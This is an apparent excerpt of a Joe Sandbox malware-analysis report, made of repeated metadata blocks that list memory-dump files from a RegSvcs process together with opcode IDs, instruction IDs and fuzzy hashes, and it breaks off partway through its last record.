                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2bf99b9302af65de771f1817e2d26410f085eabb147ea2cec7f18a63ed8626c
• Instruction ID: d7efd248d2773cd81b00c326b85d2eaabcac62b8a786fd91ab9df135aa9f7758
• Opcode Fuzzy Hash: b2bf99b9302af65de771f1817e2d26410f085eabb147ea2cec7f18a63ed8626c
• Instruction Fuzzy Hash: E132AC71A007558BDB24DF69C8547BEBBF3AF84714F28411AE486DB384DB39A842EB50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
• Instruction ID: 473a95167a7c40e9bfa4248b1850d23ee43091cde615c956d984bcfadc4afce8
• Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
• Instruction Fuzzy Hash: 98F17171E0121A9BEF15CF95C990FAEB7F6AF54714F09812AE905AB340E734EC42EB50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c8ebe877bbc8fdfa011e26e68334ff213c08db03162512b8dcd1ca1baad2208
• Instruction ID: 33be2c822d539b5b6e789233b2a88eeaed9aa85bd7cf923be1dc1aa369cf89f7
• Opcode Fuzzy Hash: 8c8ebe877bbc8fdfa011e26e68334ff213c08db03162512b8dcd1ca1baad2208
• Instruction Fuzzy Hash: 0CE1A372E04219DBEB21DF98C980BAEB7BAAF94310F158427E905E7240D7389D40EB53
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aaac6a2bcc7d57da3cb1d8486d7a1cb7d5a3a5294d1a0def6c2b703260578a90
• Instruction ID: a50114ff12f9df7307aeeda54dd550aeab2f166352a9e566ae6dbd00eb99036f
• Opcode Fuzzy Hash: aaac6a2bcc7d57da3cb1d8486d7a1cb7d5a3a5294d1a0def6c2b703260578a90
• Instruction Fuzzy Hash: C1D1E371E00A098BEF16CF59C841AFEBBF5BF88314F18C16AD595A7281D735E905CB60
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82b30516b3e934bb08539da64a032d0e6c814a4cb09ced8d8e2fb45740f347a2
• Instruction ID: 17e029779c0ad15e9e8a811ffac056df82a5857be43ef14a3c9a2f0618d3aed7
• Opcode Fuzzy Hash: 82b30516b3e934bb08539da64a032d0e6c814a4cb09ced8d8e2fb45740f347a2
• Instruction Fuzzy Hash: 51D1E072A002169BCB14DF24CD82FBA73A5BF54394F14466DF916DB281EF34D942EB50
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04b65550853ae9c84ba038ecb1942d1e856f0dab8dd6b8024e43fc832497eabd
• Instruction ID: fd78f3ca3527622406c7e7d38024107fb51b7f07b6b41c13007b4f13e55045d2
• Opcode Fuzzy Hash: 04b65550853ae9c84ba038ecb1942d1e856f0dab8dd6b8024e43fc832497eabd
• Instruction Fuzzy Hash: 06E17A71908742CFC714DF28C490A6ABBE1FF98318F14896EE999CB351DB31E905DB92
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
• Instruction ID: e41af184ab45a930be7f90e4132130bdeed4842490a78c77e6f230bd002bfee0
• Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
• Instruction Fuzzy Hash: 42B17275A006089FDF24DF94C940ABBB7B9BF84394F144459AA02A77A1EF34FD06EB10
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
• Instruction ID: da0f5524e07f7fe7a2adaf742d42286dd72d4a5d559a9511010868dc6bec17f8
• Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
• Instruction Fuzzy Hash: C2B1F632A00646AFDB21EB64C850BFEB7F6AF44310F580165E552DB391DB34EE45EB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9854f08f4b066b60b5cad4b7087747269dd417558b58d42475fe0057fd6d8d9
• Instruction ID: 267d58641675a3f4cd8784ae3c3982488b411dac4df72553a233b19b4af5d895
• Opcode Fuzzy Hash: f9854f08f4b066b60b5cad4b7087747269dd417558b58d42475fe0057fd6d8d9
• Instruction Fuzzy Hash: F1C168746083419FD760CF15C484BABB7E5BF88354F48892EE98987390EB74E909DF92
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a99a915babf277afd3b23896f0336e33ea2dd6938765c4fb674c7d9e224f55d2
• Instruction ID: ac18e200d2eea607c0ef6ff5b50c6aa329b1114b47da965e98fa85ed2a0852b7
• Opcode Fuzzy Hash: a99a915babf277afd3b23896f0336e33ea2dd6938765c4fb674c7d9e224f55d2
• Instruction Fuzzy Hash: A7B1A170A002698BDB24DF64CD80BB9B3B1EF44714F1485E9D48AE7281EB34ED85DF65
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6e5563eea14bbfe38511c30c8c81ad331867f7bc323573a6495b34d40524c8c
• Instruction ID: 4c02a5c2017c8898525504ab1b3f8526fd49fbec4093cb2dcf17822547486ac9
• Opcode Fuzzy Hash: b6e5563eea14bbfe38511c30c8c81ad331867f7bc323573a6495b34d40524c8c
• Instruction Fuzzy Hash: 64A1D171B00616DBDB24CF66C990BEAB7B1FF54324F14402AEA4597281EF78EC01EB90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 373d7705ed1b96f455b7ea16979a9a6371161278ccd2200d03e29087bb5e3204
• Instruction ID: 2139321d4a2c84b394dccda5926ca511413ccb76eefc7bc5f07ec3b575462e4f
• Opcode Fuzzy Hash: 373d7705ed1b96f455b7ea16979a9a6371161278ccd2200d03e29087bb5e3204
• Instruction Fuzzy Hash: F5A1B9B2A00611AFD721EF28C981B5ABBE9FF48704F45457CF589DB662C738E901CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                            • Instruction ID: 8cfd3fc0f1a611028c6ef6e9df638767a35ea8b7c9b6700662c96895303f0f37
                                                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                            • Instruction Fuzzy Hash: 0EB14AB1E0061ADFDF69DFA9D880AADB7F5BF48300F148179E994A7351D730A941CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf0ca532725c7e1ce0f98cd1e30ebfd4e6fbba0dda6ad13b07bfdf6876d3b4d8
                                                                                            • Instruction ID: a09df168a48f53807e4135eae4b2b3a3b7b4ef316f74383cb645d55e326f64f9
                                                                                            • Opcode Fuzzy Hash: cf0ca532725c7e1ce0f98cd1e30ebfd4e6fbba0dda6ad13b07bfdf6876d3b4d8
                                                                                            • Instruction Fuzzy Hash: 1B916071D00219ABDF15DFA8DC85BBEBBB5AF48710F154159E610EB361DB38DD00ABA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b056190b913b231f979244df63722cb2d3f76c9bd4f9147c591e849804db139
                                                                                            • Instruction ID: 7653a61f7dfd6eae113e64fa6cd04ff652dc03809a35214b7807fba1b1776928
                                                                                            • Opcode Fuzzy Hash: 3b056190b913b231f979244df63722cb2d3f76c9bd4f9147c591e849804db139
                                                                                            • Instruction Fuzzy Hash: B19143B1E003549BDB35DF15DC45BAA37A0BB4AB64F18012DFA40AB2D1D77DA801F791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a57f6a3ec63f9701565998e141c1dfbe9652652d8076383bc3049c8e6cc57d58
                                                                                            • Instruction ID: 3ddaac85e9289814f94dbd11de217f96a04e4b1b84d84ae878885657c3f10345
                                                                                            • Opcode Fuzzy Hash: a57f6a3ec63f9701565998e141c1dfbe9652652d8076383bc3049c8e6cc57d58
                                                                                            • Instruction Fuzzy Hash: 60911236E046158BDB24FB98C840BBEB7A2EF84724F19406AE805DF391E678DD01EB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4587ab3330010277dffc0d0d759d6e0370ec2cd8963029e9462e9dee53b19187
                                                                                            • Instruction ID: 28add1ffc71ab32adb01d5332ee069c746bb1b1379ac4825d286bff7cc481b6e
                                                                                            • Opcode Fuzzy Hash: 4587ab3330010277dffc0d0d759d6e0370ec2cd8963029e9462e9dee53b19187
                                                                                            • Instruction Fuzzy Hash: 02913872A0531AAFD321DF24CC81B2A77A4EF84794F040418FB806B2A1DB79EC06E791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e9a1a81c142ee4c47b1881e9c1299c2663fdf8bc53de108fc309113f413b6e91
                                                                                            • Instruction ID: 24ff24c09317f985e779f7b69344926d8cd8b7dae23cbd5bca59ea7f55e656bc
                                                                                            • Opcode Fuzzy Hash: e9a1a81c142ee4c47b1881e9c1299c2663fdf8bc53de108fc309113f413b6e91
                                                                                            • Instruction Fuzzy Hash: 7C613772A40B519BC722CF19C84AB2AB3E5EFC1B70F148529F8559B291C774FD01EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d1847585b0ae176301b743aea480a4d236b47bc6fa424c0ad76f832c12baba18
                                                                                            • Instruction ID: 8297c1481b907957b4db45eea7e000519b2ed6baebdc66057448d3fb10e117d2
                                                                                            • Opcode Fuzzy Hash: d1847585b0ae176301b743aea480a4d236b47bc6fa424c0ad76f832c12baba18
                                                                                            • Instruction Fuzzy Hash: 9F8190B1A0461A9BDB18CF69CA41BBEB7F9FB48710F00842EE445E7640E734ED41DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction ID: 9ace0b6193d1fcf2b4f0e24ef409eeccaf37f4f0cfb79e7fe1a297d9835d6f5d
                                                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                            • Instruction Fuzzy Hash: CD816D31B10209DBDB19DF99C881AAEBBFAAFC4310F1885A9D996DB345D734E901CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac51282955962cab0f112f17f44ebc6a3edcd7a956de5ebe60014576879014fa
                                                                                            • Instruction ID: 5f95fd237fc1869e23d09ea5aeebe0e143ef5221b72b518c51ba86c2a5c0a2f1
                                                                                            • Opcode Fuzzy Hash: ac51282955962cab0f112f17f44ebc6a3edcd7a956de5ebe60014576879014fa
                                                                                            • Instruction Fuzzy Hash: 48816DB1A00709AFDB25CFA5C880BEEBBF9FF89350F104429E555A7250DB70AC45EB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
